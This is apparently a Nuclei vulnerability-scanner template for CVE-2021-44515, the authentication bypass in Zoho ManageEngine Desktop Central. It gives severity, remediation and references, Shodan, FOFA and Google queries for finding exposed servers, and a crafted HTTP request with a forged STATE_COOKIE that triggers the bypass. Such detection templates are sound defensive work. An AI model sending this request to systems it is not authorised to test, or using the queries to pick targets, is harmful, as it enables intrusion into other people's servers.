Zoho ManageEngine Desktop Central - Remote Code Execution

id: CVE-2021-44515

info:
  name: Zoho ManageEngine Desktop Central - Remote Code Execution
  author: Adam Crosser
  severity: critical
  description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
  reference:
    - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
    - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
    - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
    - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44515
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44515
    cwe-id: CWE-287
    epss-score: 0.97233
    epss-percentile: 0.99811
    cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: manageengine_desktop_central
    shodan-query: http.title:"manageengine desktop central 10"
    fofa-query:
      - title="manageengine desktop central 10"
      - app="zoho-manageengine-desktop"
    google-query: intitle:"manageengine desktop central 10"
  tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp

http:
  - raw:
      - |
        GET /STATE_ID/123/agentLogUploader HTTP/1.1
        Host: {{Hostname}}
        Cookie: STATE_COOKIE=&_REQS/_TIME/123

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 0"

      - type: word
        part: header
        words:
          - "UEMJSESSIONID="

      - type: status
        status:
          - 200
# digest: 490a0046304402204e74c9d1f872acadab6809554240d33d2c3a6a705337456e69661b6c4269fc3102201e4fa02653abb82c07fca7c5bfc73a5150cc4431d900a7da941012f48ae57e2e:922c64590222798bb761d5b6d8e72950